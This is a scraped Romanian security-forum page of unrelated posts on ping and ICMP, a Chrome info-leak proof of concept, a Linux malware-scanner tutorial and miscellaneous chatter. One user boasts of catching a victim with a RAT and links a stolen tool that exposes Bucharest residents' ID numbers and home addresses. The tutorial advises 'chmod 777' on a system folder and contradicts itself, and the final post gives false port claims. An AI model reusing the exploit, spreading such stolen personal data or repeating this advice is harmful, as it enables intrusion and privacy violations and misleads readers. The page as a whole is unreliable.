Leaderboard

Da, am avut o discutie si cu un coleg si m-am uitat peste RFC-ul care defineste protocolul IP si nu se foloseste terminologia de port. Insa, teoretic vorbind, e tot un port (al protocolului IP). Noi suntem obisnuiti cu definitia clasica de port: un numar pe 16 biti bla bla. Insa in esente, porturile se folosesc pentru multiplexarea fluxului de date. Mai exact, anumite date ajung pe portul 80, altele ajung pe portul 25 etc (multiplexare). In cazul de fata, aceasta multiplexare nu se refera la un port care e folosit de un anumit program (ca TCP 80 de catre Apache), ci este un port care indica, cum spune standardul "next higher level protocol". Altfel spus, acest IP protocol/port nu face diferentierea intre programele la care trebuie sa ajunga date ci face diferentierea intre "<<programele>> pentru procesarea protocolului", cum ar fi TCP/UDP/ICMP. In acest gaz "programele" reprezinta bucatile de cod care se ocupa de procesarea protocoalelor urmatoare. Plm, nu stiu daca am explicat cum trebuie.

LOL root # tcpdump -nnvXSs 1514 -c1 icmp tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1514 bytes 23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0 0x0000: 4520 0054 882b 0000 3001 7cf5 45fe d52b E..T.+..0.|.E..+ 0x0010: 4815 222a 0800 3530 272a 0000 25ff d744 H."..50'..%..D 0x0020: ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 .^.............. 0x0030: 1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 .............!"# 0x0040: 2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 $%&'()*+,-./0123 0x0050: 3435 3637 4567 PING -> ICMP. Nu poti face ping pe port. Cum zicea si @u0m3 cand cineva spune ca face ping pe portu' x se refera la TCP / UDP (layer 4) pentru a vedea ca portu' ala e deschis / inchis. Mai general, cand cineva face ping pe portu' 80 inseamna ca trimite un TCP SYN sistemului respectiv pentru a vedea daca raspunde sau nu (ACK). PING-ul real, original, foloseste ICMP care nu foloseste porturi deloc. (sunt irelevante porturile la nivelul layerului de Internet).

.ipsType_light a { font-size: 20px !important; font-weight: bold !important; } Pentru chiorbi...

Zicea cineva mai sus: Layer 4 e o baba ce merge cu papornitele in spate Layer 3 o vede si spune: Fa, ce pana mea ai in papornite ? Ce cari acolo ? :))))

Lista completa: http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xml#protocol-numbers-1

Am vazut pe Twitter, nu stiam raspunsul. E o intrebare de networking. Ce port foloseste ping-ul?

(o.O) Daca prin PING te referi la a verifica daca un port TCP este deschis (chestie care nu se cheama PING cum a explicat si @MrGrj) atunci nu ai nici o treaba cu SSL/TSL. Vezi mai jos explicatia: PING - ICMP Echo - functioneaza la Layer 3 in modelul OSI (Network Layer) si Layer 2 in TCP/IP (Internet Layer) Scan TCP - SYN Scan (de exemplu) - functioneaza la Layer 4 in modelul OSI (Transport Layer) si Layer 3 in TCP/IP (Host-to-Host Transport Layer) SSL/TLS este implementat in Layer 5 in OSI (Session Layer) si in Layer 4 in TCP/IP (Application Layer)

Hint, ce vrei tu sa faci se numeste concatenare. Tu faci deja asta: "https://blockchain.info/q/getreceivedbyaddress/".$btcaddress Adica: "text" . $variabila Iar tu ai nevoie de: "text" . $variabila . "text in continuare" Respectiv, $mech->get("https://blockexplorer.com/api/addr/".$btcaddress . "/balance");

sunteti praf nene :))) udp = 17 tcp = 6 icmp = 1 cand va jucati cu socketii, cum pana mea definiti ?

<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1024 Chrome bug: https://bugs.chromium.org/p/chromium/issues/detail?id=671328 PoC: --> <style> content { contain: size layout; } </style> <script> function leak() { document.execCommand("selectAll"); opt.text = ""; } </script> <body onload=leak()> <content> <select> <option id="opt">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</option> </select> </content> <!-- Since this is a layout bug AFAIK the leaked data can't be obtained via DOM calls, however it's possible to obtain it using tricks like unicode-range CSS descriptor (credits to Jann Horn for coming up with that approach) which is likely sufficient to turn this into an ASLR bypass. --> Sursa: https://www.exploit-db.com/exploits/41434/

sunt prostalau, sterge pls

When connecting to the Internet there are many malicious threats which can harm the data on your computer. The Operating System (OS) can become in-operable and require to be re-installed. The OS and data and can be restored from a backup if you are able to perform backups of the OS and data. New threats appear on the Internet daily. Most people think that if they run Linux then they are free from such troubles. It is true that most of the threats out there are Windows based. What most people do not understand is that 90% of all high-end servers are running Linux. Since more of the high-end servers are Linux there are more threats being made against Linux. So, what is a threat? Malware and the like… Malware is composed of many things. Malware consists of viruses, trojans, worms and more. All a user needs to know is that their system is free of Malware. To find Malware a scanning program will look over specified folders and/or files. When the program scans, it is looking for signatures. A signature is made from a bit of unique code from Malware. The code is then hashed and placed in a database. The scanning program gets the hash from the database and looks through files to see if the hash exists. If the signature is found then the scanning program can alert the user that a threat has been found. The current Linux Malware Detect signature database contains 5,657,522 signatures. Some people will take an existing Malware program and use it as a basis for a new one. Since some of the code remains intact, the signature is the same for the new Malware. When an existing signature finds a new piece of Malware it is deemed a Heuristic or Generic Detection. Having the same signature as an existing Malware makes the new Malware within the same family. A completely new piece of Malware will most likely create a new signature. New signatures will cause the database to be updated. The number of Malware is increasing and the databases are updated constantly. When you have a program to scan your system then you will have new signature database updates often. NOTE: It is possible for a scanner to find a signature match to a file which is not Malware. This match is a false positive. The reverse is true as well. If a new Malware package has been released and is not in the database then the scanner will return a false negative. For this reason the signature database needs to be updated as often as possible. Let’s look at an example of Malware. Malware Example The list of Malware is quite extensive, especially getting into the whole family of a single signature. Choosing Malware to use as an example can be quite easy because of the number of existing samples. So, let’s look at ‘Linux.Encoder.1’. The Malware is also known as ‘Elf/Filecoder/A’ and ‘Trojan.Linux.Ransom.A’. The family of these types are extensive. The way it works is that it gets into your system attached to a file downloaded from the Internet. Once on your system it will become active and place a ‘readme’ file in every folder on the system. Other data on the system will be encrypted keeping you from accessing the true contents of the files. The ‘readme’ files contain information on how your data is being held captive and you must pay a ransom to have the files decrypted. When the files were encrypted there was a key sent to the server of the Malware creators. Once you pay the ransom it demands, if one was specified, then your data will be restored. A company named BitDefender has the ability to decrypt the files on your system and remove the Ransom-ware Malware. As usual, it is very important to keep your signature database up-to-date. Before you can perform updates you do need to have the scanner installed. One good scanner used by the Linux Malware Detect program is ClamAV. Install ClamAV The ClamAV program can be installed through the standard repository for both Red Hat and Debian systems. For Red Hat systems perform the following: yum -y install clamav calmav-devel clamav-update Once installed you will need to edit the file ‘/etc/clamav/freshclam.conf’. About seven lines down is a line which is ‘Example’. The line needs to have a ‘#’ placed at the beginning to make ‘#Example’. Further down is a line which starts with ‘#DatabaseDirectory’ with a folder following it. Remove the pound sign (#) at the beginning to uncomment the line. Another line which can be added at the bottom of the file is ‘DatabaseMirror database.clamav.net’. Save the file and in a Terminal you will need to issue the following command: sudo chmod -R 777 /usr/lib/clamav You should be able to issue the command ‘freshclam’ in a Terminal to update the database of ClamAV. On a Debian system you need to issue the following command: sudo apt-get install -y clamav ClamAV should update automatically every hour by default. The database is locked if you try to perform a ‘freshclam’ command to perform an update. Now that the scanner is installed you need to install LMD definitions and program. LMD Installation Whether in Debian or Red Hat the install will be the same. Perform the following commands in a Terminal. cd /tmp wget http://www.rfxn.com/downloads/maldetect-current.tar.gz tar -xvf maldetect-current.tar.gz ls -l | grep maldetect The last command will give you a listing of the files and folders with ‘maldetect’ in the name. You should have one similar to ‘ maldetect-1.5’. cd maldetect-1.5 [or whatever the name of the folder was in the previous step] sudo ./install.sh Now you will need to configure maldetect to work with the ClamAV Scanner by editing the file ‘/usr/local/maldetect/conf.maldet’. You need to look for a line which starts with ‘scan_clamscan’ and make sure it is set to ‘”1”’. If you want maldetect to automatically quarantine found items set the ‘quarantine_hits’ to a value of ‘1’. To clean the Malware found set the ‘quarantine_clean’ value to ‘1’. If you want to allow user scans to be performed without root access you can change the ‘scan_user_access’ value to ‘1’. Save the file and exit the editor. NOTE: Since you installed ClamAV first maldetect should already have the scanner setting set to ‘1’. If not, make sure you change it. To scan all files on your system perform the command from a Terminal: sudo maldet -a / A scan will be performed as shown in Figure 1. Maldetect will load the signatures and use the ClamAV scanner to perform the scan for the signatures in the signature file. Results of a scan are placed in a report. A report number, or SCANID, is displayed at the end of the scan. To see the report use the command ‘maldet --report SCANID’ FIGURE 1 In Figure 1 the scan which was just performed created a report with the SCANID of ‘170125-1736.1777’. To see the specific report use the command ‘maldet --report SCANID’. In the case of the scan in Figure 1 the command to see the report would be ‘maldet --report 170125-1736.1777’. To see a list of all reports use the command ‘maldet -e list’ as shown in Figure 2. FIGURE 2 To restore quarantined files found during a scan use the command: maldet -s SCANID As you can see from Figure 2 there have been three scans performed. The scan with the SCANID of ‘170124-2248.22401’ had six hits. This means it found six infected files, on the scan it performed. To use the command ‘maldet --report 170124-2248.22401’ would show results as seen in Figure 3. FIGURE 3 The main things to look at are the following lines: {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-1.5/files/clean/gzbase64.inject.unclassed {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-current.tar.gz {CAV}Win.Adware.Opencandy-78 : /media/jarret/BookC/Desktop (items)/Windows/SetupImgBsajbdfjaibufibjvSurn_2.5.8.$ {CAV}Win.Adware.Opencandy-78 : /media/jarret/BookC/Desktop (items)/Windows/SetupImgBurn_2.5.8.0.exe {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-1.5/files/clean/gzbase64.inject.unclassed {HEX}gzbase64.inject.unclassed.15 : /tmp/maldetect-current.tar.gz Lines 1, 2, 5 and 6 are positive matches found for the maldetect files. The compressed files containing the installation code and the signature database (lines 2 and 6) are noted as being infected. The scanner also detected the signature database itself in lines 1 and 5. Lines 3 and 4 are a Malware called Win.Adware.Opencandy-78. Within the report you can also see that no files were quarantined since the quarantine has not been enabled. NOTE: Do not run the scans and never check the reports. I have seen large companies do such a thing and find out that a virus was not being quarantined. Since it was not removed the virus was able to spread and cause problems. As noted at one point in the report you can manually override the quarantine to occur by using the command ‘maldet -q SCANID’. So, if I issue the command ‘maldet -q 170124-2248.22401’ as seen in Figure 4, the infected files will be quarantined. FIGURE 4 Nothing of note occurs when removing the malware which was found during a scan. NOTE: If you do not enable public scanning then you must run ‘maldet’ as sudo. Be aware of the threats on the Internet. Keep in mind to always update your signature database as often as you can. Scan your system often. I hope this article can save you trouble in the future. Happy scanning!

1.200 de cursuri online gratuite provenite din cadrul universităților de renume mondial, pentru a te ajuta în dezvoltarea pasiunii pentru care vrei să profesezi. http://www.openculture.com/freeonlinecourses

Deci am prins pe cineva in RAT-ul meu care avea un soft interesant pe desktop , l-am incercat si era destul de bun , gasea persoanele din Bucuresti : Nume , Prenume , CNP , Strada , Nr , Bloc , Etaj , Apartament , Sector . Scan : VirusTotal - Free Online Virus, Malware and URL Scanner Download (dezarhivat are 300 mb) : http://fisierulmeu.ro/63OYJCBSBALR/Politie-Bucuresti-rar.html

tvparnaie.ro

Ping-ul poate avea orice port Depinde la ce vrei sa ii dai ping. Exemplu: Daca vrei sa dai ping unui site se v-a folosi de portul 80 sau 8080. Iar pentru ping-ul tcp, udp intre echipamente, se foloseste portul 0.